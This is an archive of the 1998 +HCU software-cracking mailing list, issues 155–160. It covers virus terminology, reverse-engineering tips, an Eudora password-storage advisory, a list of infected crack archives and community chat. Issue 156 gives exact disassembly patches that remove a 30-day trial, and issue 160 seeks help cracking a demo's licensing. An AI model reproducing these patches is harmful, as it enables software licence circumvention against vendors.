  867. HalVar
  868.  
  869. ______________________________________________________
  870. Get Your Private, Free Email at **********************
  871.  
  872. =====End of Issue 154===================================
  873.  
  874.  
  875.  
  876.  
  877. ========================================================
  878. +HCU Maillist          Issue: 155             02/28/1998 
  879. --------------------------------------------------------
  880. Send Articles To:......................... *************
  881. Info, Help, Unsubscription, etc:....... ****************
  882. Web Repository.........................hcuml.home.ml.org
  883. ========================================================
  884.  
  885. CONTENTS:
  886.  
  887. #1  Subject: gthorne on virii subject
  888.  
  889. #2  Subject: virii vs. viruses (or: is Ghiribizzo schizophrenic?)
  890.  
  891. #3  Subject: Bringing floppy disks from the dead
  892.  
  893. #4  Subject: To: zinger
  894.  
  895. ARTICLES:
  896.  
  897. -----#1-------------------------------------------------
  898. Subject: gthorne on virii subject
  899.  
  900. Message Body = 
  901. viruses... virii... makes no difference which you use in the computer world, people use it interchangeably
  902. if one were truly anal one could look up the biomedical reference to it (virii just sounds more like something someone who is educated would say ;)
  903.  
  904. it appears a cat got let out of a bag with this one :)
  905.  
  906. i have written 2 virus like entities... one being a cheap ram only self replicator that picked random locations in memory and was completely written in bytes - with all relocatable code (all in ram because no hard drives... and meant too fast to duplicate to another machine before it crashed all of memory)
  907.  
  908. the other is the symbiote which i created as a way to add your own code to both exe's and com files (i wouldnt allow myself to stop at just one type - i am too pushy of myself for that)
  909.  
  910. interesting note.. since it uses standard methods to attach your code to another, it is funny - some of the newer virus scanners mistaken it for one (much like KOH which some idiot whined and insulted me for weeks over the internet because he believed the virus scanner and would not consider that it is NOT a virus --- thus is the way of sheep who believe everything they hear without doing any real research)
  911.  
  912. again, take care - this is a fun topic :)
  913.  
  914. +gthorne
  915.  
  916.  
  917. -----#2-------------------------------------------------
  918. Subject: virii vs. viruses (or: is Ghiribizzo schizophrenic?)
  919.  
  920. >>>>
  921. BTW - why virii and not viruses? (yes, I studied 6 years of 
  922. Latin)....
  923. <<<<
  924.  
  925. You'll know that the stem of the Latin word for virus doesn't have a
  926. plural. In the world of biological viruses, those involved use the term
  927. 'viruses' - this is the term Ghiribizzo uses. Most virus programmers
  928. (myself included - when I had my old persona) use the term virii. Why?
  929. Because it saves two bytes! :) [hey, that's quite a good joke - explains
  930. this commonly asked question better than anywhere else I've seen! :)]
  931.  
  932. ~~
  933. Ghiribizzo
  934.  
  935. -----#3-------------------------------------------------
  936. Subject: Bringing floppy disks from the dead
  937.  
  938. I had a little think about fixing the floppy disk I killed and was
  939. beginning to reverse engineer format.com to use it's basic code when I
  940. realised the tool was already there!
  941.  
  942. Use the /c option to check all clusters currently marked bad. If it is
  943. possible to quickformat using this option, then maybe this is a good way to
  944. 'lock' a disk as not many people will know about this and also won't be
  945. able to destroy the data via format.
  946.  
  947. ~~
  948. Ghiribizzo
  949.  
  950. -----#4-------------------------------------------------
  951. Subject: To: zinger
  952.  
  953. You can publish all I said if you want, I just want to clarify again that I don't like viruses except for learning purposes, I can't find any good reason to code one and release it. Regards.
  954.  
  955.  
  956.  
  957.  
  958. =====End of Issue 155===================================
  959.  
  960.  
  961.  
  962.  
  963. ========================================================
  964. +HCU Maillist          Issue: 156             03/04/1998 
  965. --------------------------------------------------------
  966. Send Articles To:......................... *************
  967. Info, Help, Unsubscription, etc:....... ****************
  968. Web Repository.........................hcuml.home.ml.org
  969. ========================================================
  970.  
  971. CONTENTS:
  972.  
  973. #1  Subject: Freespace-Essay
  974.  
  975. #2  Subject: Search for Tristan
  976.  
  977. ARTICLES:
  978.  
  979. -----#1-------------------------------------------------
  980. Subject: Freespace-Essay
  981.  
  982. Hi all,
  983. this is my first little essay. I hope it is o.K. If not
  984. please tell me what i can do better in future.
  985.  
  986. Target: Free Space 1.0 at ************************************
  987. Protection: 30-day-trial
  988. Tools:
  989. Wdasm8.9
  990. Softice 3.01
  991.  
  992. For this program i had to patch 2 programs: Frespace.exe and fs32.exe.
  993. Both have self-modifying code (i suggest). 
  994.  
  995. First Frespace.exe:
  996.  
  997. * Reference To: KERNEL32.CloseHandle, Ord:0018h
  998.                                   |
  999. :00406A28 FF1538544200            Call dword ptr [00425438]
  1000. :00406A2E 8B84247C010000          mov eax, dword ptr [esp+0000017C]
  1001. :00406A35 50                      push eax
  1002. :00406A36 FF15F8254100            call dword ptr [004125F8]; *here
  1003.  
  1004. I replaced this call at 406a36 with a "call 404770" (the original code):
  1005.  
  1006. * Referenced by a CALL at Address:
  1007. |:0040219D   
  1008. |
  1009. :00404770 8B442404                mov eax, dword ptr [esp+04]
  1010. :00404774 83EC70                  sub esp, 00000070
  1011. :00404777 89442408                mov dword ptr [esp+08], eax
  1012. :0040477B 53                      push ebx
  1013. :0040477C 56                      push esi
  1014. :0040477D 57                      push edi
  1015. :0040477E 8BB42484000000          mov esi, dword ptr [esp+00000084]
  1016. :00404785 55                      push ebp
  1017. :00404786 56                      push esi
  1018.  
  1019. Second: fs32.exe
  1020.  
  1021. * Reference To: KERNEL32.CloseHandle, Ord:0018h
  1022.                                   |
  1023. :00404AC4 FF1548034100            Call dword ptr [00410348]
  1024. :00404ACA 8B842480010000          mov eax, dword ptr [esp+00000180]
  1025. :00404AD1 50                      push eax
  1026. :00404AD2 FF1568D24000            call dword ptr [0040D268]; *here
  1027.  
  1028. I replaced this call at 404ad2 with a "call 408540" (the original code):
  1029.  
  1030. * Referenced by a CALL at Address:
  1031. |:00408130   
  1032. |
  1033. :00408540 8B442404                mov eax, dword ptr [esp+04]
  1034. :00408544 83EC10                  sub esp, 00000010
  1035. :00408547 3B05D0F84000            cmp eax, dword ptr [0040F8D0]
  1036. :0040854D 53                      push ebx
  1037. :0040854E 56                      push esi
  1038. :0040854F 57                      push edi
  1039. :00408550 55                      push ebp
  1040.  
  1041. That┤s all.
  1042.  
  1043. NiKai 5777852 (ICQ)
  1044.  
  1045.  
  1046. ______________________________________________________
  1047. Get Your Private, Free Email at **********************
  1048.  
  1049. -----#2-------------------------------------------------
  1050. Subject: Search for Tristan
  1051.  
  1052. Hi,
  1053. sorry for this off-topic, but i search for a person named Tristan. I 
  1054. read an essay by him at fravia┤s pages and i lost his email-adress.
  1055. Can anybody help?
  1056.  
  1057. NiKai
  1058. 5777852 (ICQ)
  1059.  
  1060.  
  1061. ______________________________________________________
  1062. Get Your Private, Free Email at **********************
  1063.  
  1064. =====End of Issue 156===================================
  1065.  
  1066.  
  1067.  
  1068.  
  1069. ========================================================
  1070. +HCU Maillist          Issue: 157             03/05/1998 
  1071. --------------------------------------------------------
  1072. Send Articles To:......................... *************
  1073. Info, Help, Unsubscription, etc:....... ****************
  1074. Web Repository.........................hcuml.home.ml.org
  1075. ========================================================
  1076.  
  1077. CONTENTS:
  1078.  
  1079. #1  Subject: none
  1080.  
  1081. #2  Subject: "grasping +orc's lessons"
  1082.  
  1083. ARTICLES:
  1084.  
  1085. -----#1-------------------------------------------------
  1086. Subject: none
  1087.  
  1088. Has anyone hints using winice 3.22 with mga millenium2?
  1089. I just need this info,for the rest all is ok
  1090. thx
  1091.  
  1092. ______________________________________________________
  1093. Get Your Private, Free Email at **********************
  1094.  
  1095. -----#2-------------------------------------------------
  1096. Subject: "grasping +orc's lessons"
  1097.  
  1098. Hi +HCU, how are you guys. Sorry to take your time once again, but i am in
  1099. need of your expertise and opinion.
  1100.  
  1101. I am a new student of cracking and have dowmloaded many tutorials including
  1102. the +ORC tutorials, i'am finding however it difficult to grasp and follow
  1103. +ORC's work, one main reason is that the target files and the tools he uses
  1104. are relatively hard to find now, they are not recent, many are outdated
  1105. whick makes it even harder to find. Even with the more modern versions it
  1106. becomes confusing to follow since may functions and instructions have changed.
  1107. Another main reason is that i find his methods are somewhat different to
  1108. the more modern tutroials, especially in +ocs first few lessons.
  1109.  
  1110. Dispite this however i am able to understand and follow the more moderm
  1111. tutorials.
  1112. BUT EVEN SO i still feel a "void" to not having totally understand +ORC's
  1113. lessons,
  1114. I know you regard +orc highly and are one of those who did break the
  1115. barrier and grasp the teachings..how long did it take?...did you have a
  1116. struggle?...how did you finally crack the barrier?
  1117.  
  1118. I guess what i really want to know is...will i miss something important and
  1119. ENLIGHTENING if i do not totally understand the lessons? please let me know
  1120. so that i can decided wether to move on or to continue to wrestle with the
  1121. lessons until i win the prize.
  1122.  
  1123. Thankyou for time and help, hope to hear from u soon.
  1124.  
  1125.  
  1126. =====End of Issue 157===================================
  1127.  
  1128.  
  1129.  
  1130.  
  1131. ========================================================
  1132. +HCU Maillist          Issue: 158             03/06/1998 
  1133. --------------------------------------------------------
  1134. Send Articles To:......................... *************
  1135. Info, Help, Unsubscription, etc:....... ****************
  1136. Web Repository.........................hcuml.home.ml.org
  1137. ========================================================
  1138.  
  1139. CONTENTS:
  1140.  
  1141. #1  Subject: re: "grasping +orc's lessons"
  1142.  
  1143. #2  Subject: gthorne re: 
  1144.  
  1145. #3  Subject: gthorne - re: grasping orc lessons
  1146.  
  1147. ARTICLES:
  1148.  
  1149. -----#1-------------------------------------------------
  1150. Subject: re: "grasping +orc's lessons"
  1151.  
  1152. Hi +HCU,
  1153. In reply to the letter in last issue, I too am new to cracking.  I have also
  1154. found it a challenge to grasp +ORC's tutes, but mainly due to the
  1155. distractive feel of the tutes..
  1156. The actual crack is not often explained too well, more quickly "shown.  I
  1157. wish to take nothing away from +ORC, the work he has done along with
  1158. GreyThone and Fravia, is nothing short of legendary. (how many HOURS????)
  1159.  
  1160. If you need the tools, programs etc, check out GreyThorne's website. The ORC
  1161. tutes are bundled with every file neede for the tute. greythorne.home.ml.org
  1162. I know too well of the Barrier you face, but hang in there!
  1163.  
  1164. for an idea of timeframe:
  1165. with no programming experience, I have been at it for 2 months (on & off,
  1166. with work and wife dont leave much time!!).
  1167. I Have not yet completed a crack by myself, but feel it is close. I guess
  1168. you wanted some feedback from more experienced crackers, but I wanted to let
  1169. you know that you are not alone.
  1170.  
  1171. cheers!!
  1172.  
  1173.  
  1174.  
  1175.  
  1176.  
  1177. -----#2-------------------------------------------------
  1178. Subject: gthorne re: 
  1179.  
  1180. Message Body = 
  1181. (you may want to sign your messages to the hcuml with a nickname since noone has any clue who you are from the anonymous message you posted)
  1182.  
  1183. though you are bound to get a bunch of replies, i have already tried to take care of the tools aspect
  1184.  
  1185. go to my site ***************************** and download the orcpaks you find there
  1186.  
  1187. just about everything and then some evr listed in the prc tutorials is there, and the index file has most of them catalogued so you can see what is in them
  1188.  
  1189. other useful sites, though not encapsulated in such a manner, are all over the web, and a good one is *************************** assuming caligo can stay online with all his tools as well
  1190.  
  1191. for completely new people, i tend to send them to lesson 4 on wlcheck, since the 16 bit crack was mine, and the 32 bit crack completed by fravia (see if you can follow along in that order) - and it was done in mostly wdasm (using softice to follow along in the code is a good idea for any crack, and you may find it useful to use both softice and some form of disassembler in conjunction as one often reveals something that may have been rather hard to spot in the other
  1192.  
  1193. the other windows lesson i wrote on siren mail uses a similar technique - so it might be handy for you to check that out as well (siren mail crack on fravia's site and sirenpak in the orcpaks/more directory of my website)
  1194.  
  1195. * btw - if someone tries to use sirenpak and cannot load it, please let me know, i may need to update an old dll that is in there, not sure *
  1196.  
  1197. if you are an irc buff, the people in #cracking4newbies tend to be helpful if they can, as some of them are not newbies at all - but love to hang around in that channel since it is more friendly than others (often you will find me there as well when i am not so busy - to hang out and chat for a bit while trying to relax from a ton of coding
  1198.  
  1199. channel #cracking is a good one for the more technical minded who have been around a while - meaning that most of the crackers there are long in the cracking scene and tend to be slightly jaded from so many newer crackers and their many needs - which is the same reason i made my website in the first place, so i could help more people indirectly since direct is much too time consuming
  1200.  
  1201. any other addresses of sites would be completely welcome additions to hcuml - and should be posted on occasion since the newer users of our mailing list cannot get the addresses out of the back issues which have been stripped of them (just not too often or it becomes spam ;)
  1202.  
  1203. mexelite's page is focused on a newer user as well - i think it is mex98.home.ml.org - but this can be verified on channel #cracking4newbies since mexelite tends to hang around there
  1204.  
  1205. for that matter, #revolt seems to be restructuring lately after a long break and many changes, so for any of you who are interested in checking them out and seeing if they are up to cracking or helping somehow, it cant hurt, though it may take a bit before things get really rolling for them again
  1206.  
  1207. well, back to coding i go...
  1208. i don't want to seem like i don't ever shut up ;)
  1209.  
  1210. take care
  1211.  
  1212. +gthorne
  1213.  
  1214.  
  1215. -----#3-------------------------------------------------
  1216. Subject: gthorne - re: grasping orc lessons
  1217.  
  1218. Message Body = 
  1219. the message i just sent had the topic cut off, and was meant to respond to the letter on someone needing help grasping orc lessons
  1220.  
  1221. +gthorne
  1222.  
  1223. =====End of Issue 158===================================
  1224.  
  1225.  
  1226.  
  1227.  
  1228. ========================================================
  1229. +HCU Maillist          Issue: 159             03/07/1998 
  1230. --------------------------------------------------------
  1231. Send Articles To:......................... *************
  1232. Info, Help, Unsubscription, etc:....... ****************
  1233. Web Repository.........................hcuml.home.ml.org
  1234. ========================================================
  1235.  
  1236. CONTENTS:
  1237.  
  1238. #1  Subject: Re: What every cracker should have
  1239.  
  1240. #2  Subject: (Fwd) Eudora 4.0 password encryption flaw
  1241.  
  1242. #3  Subject: Be encouraged and not discouraged by what you find.
  1243.  
  1244. #4  Subject: gthorne - an interesting day
  1245.  
  1246. ARTICLES:
  1247.  
  1248. -----#1-------------------------------------------------
  1249. Subject: Re: What every cracker should have
  1250.  
  1251. Hi Wafna,
  1252. do you tell me the rest of your tricks if i send you the full german 
  1253. version of Skat2010? :)
  1254. It┤s a 487 kb self-extracting exe.
  1255.  
  1256. NiKai 5777852 (ICQ)
  1257.  
  1258.  
  1259. ______________________________________________________
  1260. Get Your Private, Free Email at **********************
  1261.  
  1262. -----#2-------------------------------------------------
  1263. Subject: (Fwd) Eudora 4.0 password encryption flaw
  1264.  
  1265. Somebody sent me, this, perhaps someone may be interested
  1266.  
  1267. ------- Forwarded Message Follows -------
  1268.  
  1269. THE PROBLEM
  1270. The mail program Eudora from Qualcomm Inc. has the ability to save the
  1271. mail password in its INI file ('save password'. This password is
  1272. encrypted in a not-too-strong way.
  1273.  
  1274. HOW-TO
  1275. There's a program called EUDPASS.COM on the Net that can easily
  1276. decrypt this password. Although Qualcomm does know about this (I
  1277. mentioned the problem several times, also prior to the release of
  1278. Eudora 3), the problem still exists in current versions and has not
  1279. been fixed.
  1280.  
  1281. AFFECTED SOFTWARE
  1282. ALL Eudora clients for Windows are vulnerable, Light and Pro,
  1283. including the just-released version 4. As I don't have a Macintosh, I
  1284. could not verify
  1285.  
  1286. how Eudora stores its password on a Mac.
  1287.  
  1288. WHAT TO DO
  1289. Although they know the problem, no solution has been offered by
  1290. Qualcomm.
  1291. Until they change the encryption algorithm, the password can be easily
  1292. decrypted by anyone with access to the INI file. Of course, having the
  1293. INI file means someone can check your mail. But that 'someone'  could
  1294. not use the password to log in directly to the machine the mail is
  1295. stored on. With this utility, the password itself can be obtained.
  1296.  
  1297. Don't save your password, or make sure your INI file (better, the
  1298. entire
  1299.  
  1300. mail directory) can not be accessed by anyone. Hope Qualcomm will
  1301. change
  1302.  
  1303. the algorithm some day.
  1304.  
  1305. -----#3-------------------------------------------------
  1306. Subject: Be encouraged and not discouraged by what you find.
  1307.  
  1308. Hail +All and +new:
  1309.  
  1310. Briefly coming back from the dead zone of the working class for
  1311. a break. To the new student(s) of cracking who posted on March 5,
  1312. welcome to the dark woods. Yeah, having come this far, you only
  1313. begin to realize how far you have to go. Go check out +gthorne's
  1314. Orcpacks and fravia+ essays for stuff to work at on your own pace.
  1315. More than enough there to keep one occupied with a cross section
  1316. of research material for a long time.
  1317.  
  1318. There's no real barrier to crack, just a lot of reading and
  1319. getting your hands on the corresponding programs to practice on,
  1320. in order to acquire and properly apply your knowledge and skill.
  1321. I doubt that many of us are full time crackers, making a fortune
  1322. selling cracks. I myself have found that by visiting fravia+ and
  1323. reading this mailing list, I reinforce my problem solving and
  1324. searching skills for the work place, where I earn my living.
  1325.  
  1326. At this school of higher learning, there is no supervision. No
  1327. one to tell what you to do and how to do it. You've got to be
  1328. your own master and tell yourself when you are on the wrong track
  1329. and get back on the right one.  Easy to say, tough to do.
  1330.  
  1331. < I guess what i really want to know is...will i miss something
  1332. < important and ENLIGHTENING if i do not totally understand the
  1333. < lessons? please let me know so that i can decided wether to
  1334. < move on or to continue to  wrestle with the lessons until i win
  1335. < the prize.
  1336.  
  1337. For the same reasons, why we are not all born on the same day and
  1338. live the same lives, what do you think you are missing?  You can
  1339. spend your whole life searching and still not find it. If you do
  1340. find it, can you take it to your grave with you?
  1341.  
  1342. If you need a place to hang out, this is it, not because of the
  1343. topic but because of the intellectual interaction and discussion
  1344. among the members.  Like lions, they will bring down the prey of
  1345. some holy protection scheme and expose the inner workings and
  1346. tender morsels for you to contemplate and digess.  It is their
  1347. precious gift to you, but you've got to be around to receive it.
  1348.  
  1349. If you are like myself at this point in time, master in no area
  1350. of expertise, just sit back and soak it in like a sponge.  The
  1351. generosity of the participants in sharing their knowledge is
  1352. overwhelming and it's free.
  1353.  
  1354. In time, you'll be amazed at what you have learnt.  You do have
  1355. time, don't you?
  1356.  
  1357. wlc
  1358.  
  1359. -----#4-------------------------------------------------
  1360. Subject: gthorne - an interesting day
  1361.  
  1362. Message Body = 
  1363.  
  1364. I just attended another of about five 2600 meetings I have ever been to and it started out kinda lame until the first person showed up late and started peeking through the o'reilly tcp/ip and unix manuals I had strewn about the table.
  1365.  
  1366. He and I played 'spot the fed' for a while, though they seemed not to be around at this particular one - 'seemed' being the operative word.
  1367.  
  1368. The (rather spastic fellow.. which is kind of like me on too much coffee as i have been all day..) handed me a copy of the newest 2600 magazine which does not hit the newsstand for 3 days (of which he had several copies...)
  1369.  
  1370. At this point i was of course rather impressed, first at the interest with which he showed in deterring tcpip attacks (of which one of his servers seems to have problems with one in particular - and a problem with which i am not at all that useful in solving (yet)
  1371. and then about the fact that he had these magazines in abundance which were not generally available.
  1372.  
  1373. So I finally got around to asking who he was, and i recognize him from a few months ago as well.. with a friend of his (his friend states that cold fusion 4 and above has the innate ability to adjust remote webserver variables - of which i will have to see for myself!)
  1374. It turns out that (for you fellows who have a copy of this interesting magazine and have actually looked at the front cover (and who are ready to shoot me by now for being so damned suspenseful... is none other than Ben the layout editor for 2600 magazine.
  1375.  
  1376. Well dear readers, I am quite the decadent one and of course had him sign my new copy :)
  1377.  
  1378. Of all the places in the world to be, it would seem he and i live in the same town
  1379.  
  1380. This is actually the first meeting that I have been to that actually led anywhere, as we discussed what I (we in hcu) do - a little on how protocols worked... got a signed copy... etc...
  1381.  
  1382. Anyway - I thought it was rather cool, noone else near me seems to be interested in codes and cracking, hacking and the like - as it has always been for me
  1383.  
  1384. The sad part of course is that noone of that fine 'organization' seems to have any idea what we do, or that cracking.net ever even existed (not that i am surprised, but it is still disappointing nonetheless)
  1385.  
  1386. Maybe with luck (and a little work on my part) the gap between hackers and crackers can be made a little less obvious
  1387.  
  1388. Who knows.
  1389.  
  1390. I think I am going to have another coffee.
  1391.  
  1392. +gthorne
  1393.  
  1394.  
  1395. =====End of Issue 159===================================
  1396.  
  1397.  
  1398.  
  1399.  
  1400. ========================================================
  1401. +HCU Maillist          Issue: 160             03/09/1998 
  1402. --------------------------------------------------------
  1403. Send Articles To:......................... *************
  1404. Info, Help, Unsubscription, etc:....... ****************
  1405. Web Repository.........................hcuml.home.ml.org
  1406. ========================================================
  1407.  
  1408. CONTENTS:
  1409.  
  1410. #1  Subject: some things I have learnt (I know - woopie)
  1411.  
  1412. #2  Subject: frustration with PCBDEMO
  1413.  
  1414. #3  Subject: virii
  1415.  
  1416. #4  Subject: Easter Egg in W95
  1417.  
  1418. #5  Subject: 2600 Magazine
  1419.  
  1420. ARTICLES:
  1421.  
  1422. -----#1-------------------------------------------------
  1423. Subject: some things I have learnt (I know - woopie)
  1424.  
  1425. Greetings ever1 !
  1426. I have a few things to vent today....
  1427.  
  1428. How lucky is +Gthorne to even BE at a 2600 meeting!!!???
  1429.  
  1430. If any1 has any info on getting 2600 mag in Australia please let me know,
  1431. also I'd love to see anty Back issues.
  1432.  
  1433. As the anon person who replied to the letter about the "barrier", +orc's
  1434. lessons etc..
  1435. I believe that I have made a vast progress this week(being learming for
  1436. approx 2 weeks) in a number of ways:
  1437.  
  1438. 1. In #C4N some1 mentioned HWND <program>  -  This was very enlightening!
  1439. This shows what your program functions are
  1440.  
  1441. 2. learning the search in SIce :  s 0 l ffffff "strin_u_want"
  1442. this searches for a string in memory:
  1443. s    -  search
  1444. 0   -   starting bytes
  1445. l    -   length
  1446. "strin"  -  the text you wanna look for
  1447.  
  1448. 3. BPR <address> <address> R|W  - is a breakpoint when a prog tries to read
  1449. or write to specified mem address.
  1450. ex :  BPR 0013742bd 0013742bd RW
  1451.  
  1452. 4. BPX hmemcpy - will break when a program copies to memory(I think!)
  1453.  
  1454. 5. Once I have broken into the routine that I think is near the copy
  1455. protection, I have been doing a "D ax" or "D 15c5" to find out what value is
  1456. in the register or mem loc.
  1457. Is this a good way to find things? I have allso stepped through the cod with
  1458. F10 and did plenty of "d <register/memloc>". Am I wasting time?  I am
  1459. beginning to understand the ASM better from this anyway.  I tend to look at
  1460. anything that mucks with strings such as SI , DI, etc..
  1461.  
  1462. hope some of this helps some1... anything I am misguided in please let me
  1463. know!!
  1464. cheers,
  1465. HaQue
  1466.  
  1467.  
  1468.  
  1469.  
  1470.  
  1471. -----#2-------------------------------------------------
  1472. Subject: frustration with PCBDEMO
  1473.  
  1474. Hi again ppl!!
  1475. I guess  by now everyone in #c4n would be getting sick of me asking about
  1476. ways to crack this program, But I cannot rest Till I have either cracked it
  1477. else found out its not crackable.
  1478. The program is PCBDEMO.ZIP (PCB Designer by Niche software) , available at
  1479. ********************************* It is a printed circuit board program.
  1480. They say that the only diff between the full ver and demo is that the demo
  1481. will only print "sample.pcb"
  1482.  
  1483. I have found that in the c:\windows\pcb.ini file there is a "user, serial,
  1484. address" field.
  1485. I tried bpint 21, but it doesnt seem to access the file for that info...
  1486. I can't find any way to register the program either.
  1487.  
  1488. I cannot seem to load the Exports from the .exe, or the .dll ??
  1489.  
  1490. Doing HWND in Sice finds stuff like "SLHMessageBar", "SLHTipWindow" etc..
  1491. but I cant set bpx's on them..(cant load the exports??)
  1492.  
  1493. I have found string that says (Demo version) by itself which leads me to
  1494. believe that the program puts that string in there while unregistered?
  1495.  
  1496. I have tried entering in user="HaQue", serial="11111111" in the pcb.ini, but
  1497. have never found reference in Sice to show that PCBDEMO is using that
  1498. info...
  1499.  
  1500. I have tried millions of things from my limited knowledge and It has come
  1501. time to shout HELP!!!!!
  1502. I don't neccessarily want any1 to write a crack, patch, tute etc - even a
  1503. simple: "this program can be registerd, and cracked" or "This is a demo only
  1504. you twit" would be fine!
  1505. TIA
  1506. Cheers
  1507. HaQue
  1508.  
  1509.  
  1510. -----#3-------------------------------------------------
  1511. Subject: virii
  1512.  
  1513. Hi again
  1514. my third letter today! - important info that some of you might not be aware
  1515. of.
  1516. I recieved this in another mail and some of you may uses these files...
  1517.  
  1518. <QUOTE>
  1519. Here is a list of other possible/probable infected files that
  1520. were reported by a Russian virus scanner called DrWeb, and Norton
  1521. Av and Integrity Checker virus scanner. Some of these infected
  1522. cracks are on web sites and a few are on the cd with 6,000 cracks.
  1523. A working of PC Cillin would be great to run over these new
  1524. cracks too!
  1525.  
  1526. COOLED_1.ZIP   Bomb - Instantly Overwrites All Files on your computer
  1527. C4A_H__1.ZIP   Home Away 2.12   virus unknown
  1528. DSI_AZP2.ZIP   Advanced ZIP Password Recovery 0.90  Omnivirus
  1529. DWCDWZ09.ZIP   COM.BOOT.CRYPT.Virus
  1530. DWTASKCK.ZIP   COM.BOOT.CRYPT.Virus
  1531. DW_TB98.ZIP    COM.BOOT.Virus
  1532. FR_CC305.ZIP   Raid.5831 virus
  1533. FR_EMN27.ZIP   Raid.5831 virus
  1534. FR_IN12.ZIP    Raid.5831 virus
  1535. FR_PWB98.ZIP   Raid.5831 virus
  1536. FR_SW305.ZIP   Raid.5831 virus
  1537. FR_TTT2D.ZIP   Raid.5831 virus
  1538. FZC104E.ZIP    Omnivirus
  1539. GR302CRK.ZIP   Omnivirus
  1540. IPHONE40.ZIP   COM.BOOT.CRYPT.Virus
  1541. PC_EZ20A.ZIP   COM.BOOT.TSR.Virus
  1542. PC_JFP30.ZIP   COM.BOOT.TSR.Virus
  1543. PC_KS112.ZIP   COM.BOOT.TSR.Virus
  1544. PC_MD260.ZIP   COM.BOOT.TSR.Virus
  1545. PC_MP170.ZIP   COM.TSR.CRYPT.Virus
  1546. UCFBW333.ZIP   Blackwidow 3.33  virus unknown
  1547. VDL_MF20.ZIP   COM.TSR.CRYPT.Virus
  1548. VDL_P3D1.ZIP   COM.TSR.CRYPT.Virus
  1549.  
  1550. <ENDQUOTE>
  1551. cheers
  1552. HaQue
  1553.  
  1554.  
  1555.  
  1556. -----#4-------------------------------------------------
  1557. Subject: Easter Egg in W95
  1558.  
  1559.  
  1560. Hi there! This is my first time writing to the list.
  1561.  
  1562. I'd like to show you an EasterEgg planted inside Micro$oft Windows 95
  1563. that you might not know. If you don┤t like things like this in the list,
  1564. tell me! I won't do it again.
  1565.  
  1566. 1st. You should create a new folder anywhere (i.e desktop)
  1567. 2nd. Change the name of the folder to "New Folder" -without the quotes
  1568. and taking      notice about Caps-.
  1569.  
  1570. 3rd. Change the name again to "and now, the moment you've all been
  1571. waiting for"
  1572. 4th. Change the name once again to "we proudly present for your viewing
  1573. pleasure"
  1574. 5th. Last change "The Microsoft Windows 95 Product Team!"
  1575. 6th. Once done this last name change, switch your speakers on and open
  1576. the folder.
  1577.  
  1578.  
  1579. Amazing how this guys increase the length of the 'operating system'
  1580. (sic) with this nonsenses....
  1581.  
  1582. BTW, why is it that HotMail URLs are not striped in the articles we
  1583. receive?
  1584. I don't think we should get their email acounts now that it belongs to
  1585. MicroSoft, shouldn't we?
  1586.  
  1587. Chers
  1588.     Mr.DoS
  1589.  
  1590.  
  1591.  
  1592. -----#5-------------------------------------------------
  1593. Subject: 2600 Magazine
  1594.  
  1595. Hello Everyone
  1596.  
  1597. Hello Gthorne
  1598.  
  1599. >The (rather spastic fellow.. which is kind of like me on too much 
  1600. >coffee as i
  1601. >have been all day..) handed me a copy of the newest 2600 >magazine 
  1602. which does not
  1603. >hit the newsstand for 3 days (of which he had several copies...)
  1604.  
  1605. Due to my indolence is 2600 a FREE magazine or in my dreams? :-))
  1606.  
  1607. Are there any FREE hacking magazines you would recommend?
  1608.  
  1609. cheers Rundus
  1610.  
  1611.  
  1612. ______________________________________________________
  1613. Get Your Private, Free Email at **********************
  1614.  
  1615. =====End of Issue 160===================================
  1616.  
  1617.  
  1618.  
  1619.  
  1620.